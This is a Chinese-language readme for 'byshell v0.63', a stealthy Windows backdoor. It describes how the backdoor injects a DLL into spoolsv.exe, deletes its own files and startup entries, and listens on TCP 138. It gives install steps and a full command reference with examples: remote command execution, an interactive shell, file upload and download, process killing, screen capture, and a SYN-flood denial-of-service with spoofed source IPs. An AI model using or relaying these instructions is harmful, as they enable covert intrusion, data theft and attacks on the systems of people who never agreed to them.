byshell    v0.63
						author："by"
	byshell v0.63,用戶態(tài)實(shí)現(xiàn)無進(jìn)程無DLL無硬盤文件無啟動(dòng)項(xiàng)的后門程序。利用線程注射DLL到系統(tǒng)進(jìn)程，解除DLL映射并刪除自身文件和啟動(dòng)項(xiàng)，關(guān)機(jī)時(shí)恢復(fù)。大量的借鑒和學(xué)習(xí)了農(nóng)民的cmdbind2的思想，在這里對(duì)農(nóng)民前輩無私共享的精神致以120分感謝。目前把后門綁在TCP138,以后會(huì)改成無連接或端口復(fù)用的:)原代碼和注釋寫的比較凌亂，和本人的不好的程序風(fēng)格有關(guān)，望大家諒解:(作者允許此軟件及其源代碼自由傳播，但引用時(shí)應(yīng)注明原出處。在聯(lián)系作者并得到同意之前，不得將此軟件改編或刪選后用作商業(yè)用途，但可用作學(xué)習(xí)和私人用途。
	本軟件僅僅支持NT以上的Wind0wZ系統(tǒng)。第一次使用時(shí)，在服務(wù)端把ntboot.exe和ntboot.dll放在同一目錄下，執(zhí)行ntboot.exe -install，安裝完成后安裝文件可以刪除。以后當(dāng)服務(wù)端上網(wǎng)，byshell會(huì)注射到spoolsv.exe中，可以自行修改原碼改變注射的進(jìn)程名。
	
	符號(hào)#是這個(gè)軟件的命令提示符。目前支持的命令：
cmd		在此后跟你要執(zhí)行的cmd命令，注意：只能執(zhí)行一條單獨(dú)的命令。僅僅支持NT以上的Wind0wZ系統(tǒng)。
	eg.  #cmddir c:\winnt
shell		輸入此命令后，進(jìn)入交互的遠(yuǎn)程cmd，直到鍵入endshell返回#提示符。僅僅支持NT以上的Wind0wZ系統(tǒng)。
endshell	從shell狀態(tài)返回#提示符。
chpass		改變后門密碼。默認(rèn)為“by”。
	eg.  #chpass123456
byver		查看連接的服務(wù)端的版本，新舊版本的客戶服務(wù)端間交互時(shí)，可能有嚴(yán)重的兼容性問題。
sysinfo		取得對(duì)方的基本系統(tǒng)信息。
pslist		對(duì)方進(jìn)程列表。
pskill		殺死對(duì)方指定進(jìn)程。在此后跟你要?dú)⑺赖倪M(jìn)程的PID（由pslist得到）。
	eg.  #pskill972
modlist		對(duì)方指定進(jìn)程加載的所有DLL的列表。在此后跟你要查看的進(jìn)程的PID（由pslist得到）。
	eg.  #modlist972
get		在此軟件的連接上下載遠(yuǎn)程文件。命令格式：
	get <tab鍵> 本地保存文件名 <tab鍵> 遠(yuǎn)程下載文件名
	eg.  #get	c:\download\file.txt	d:\sourcefile.txt
put		在此軟件的連接上向遠(yuǎn)程上傳文件。命令格式：
	put <tab鍵> 遠(yuǎn)程保存文件名 <tab鍵> 本地上傳文件名
	eg.  #put	d:\receive\file.txt	c:\sourcefile.txt
reboot		重啟對(duì)方機(jī)器。
dettach		解除byshell的重啟，下次重啟就不會(huì)有byshell了。
screen		遠(yuǎn)程截屏到本地保存為c:\remotedesktop.bmp。查看此文件可監(jiān)視遠(yuǎn)程屏幕。（似乎在0.63以后的版本不能使用，我不太明白原因，哪位高手如能指教非常感謝）
	搞笑功能，開懷一笑：
popmsg		彈出信息框。
	eg.  #popmsghello,are you all right?
swapmouse	遠(yuǎn)程鼠標(biāo)左右鍵交換。
storemouse	遠(yuǎn)程鼠標(biāo)左右鍵復(fù)原。


警告：以下的SYN功能有一定的危險(xiǎn)性，僅僅用做測(cè)試。如果用戶非法使用此功能攻擊合法站點(diǎn)，將自己承擔(dān)全部法律后果。
SYN		使用服務(wù)端發(fā)起SYN洪水的拒絕服務(wù)攻擊測(cè)試。
參數(shù)：SYN 測(cè)試對(duì)象 測(cè)試的分鐘數(shù) IP偽造類型（可選參數(shù)，0是完全偽造，1是C段偽造，2是不偽造，默認(rèn)為0） 發(fā)包頻率（默認(rèn)100個(gè)休息1ms） 攻擊對(duì)象端口（可選參數(shù)，默認(rèn)為80WWW端口） 使用的端口（可選參數(shù)，0是隨機(jī)變化，默認(rèn)為0）
如果選擇了某個(gè)可選參數(shù)，那么在它左邊的可選參數(shù)就必須被選擇，在它右邊的可選參數(shù)則可以忽略。
	eg.	#SYN 172.18.1.5 15
	eg.	#SYN 172.18.1.5 15 1
	eg.	#SYN 172.18.1.5 15 1 1000 445 12345
queryDOS	查詢服務(wù)端SYN攻擊測(cè)試的詳細(xì)情況。
endDOS		強(qiáng)制結(jié)束服務(wù)端的SYN作業(yè)。

	由于作者是初學(xué)者，水平有限，程序一定存在很多BUG。謝謝各位朋友、前輩指教：
		華東師大軟件學(xué)院04級(jí)     baiyuanfan@163.com
    特別感謝在我寫這個(gè)小軟件時(shí)給了我很大幫助的gxisone（谷夕）,glacier（黃鑫）和xfocus.net的所有朋友，是他們的支持使我這個(gè)初學(xué)者能夠克服困難和疑惑，最終完成這個(gè)程序。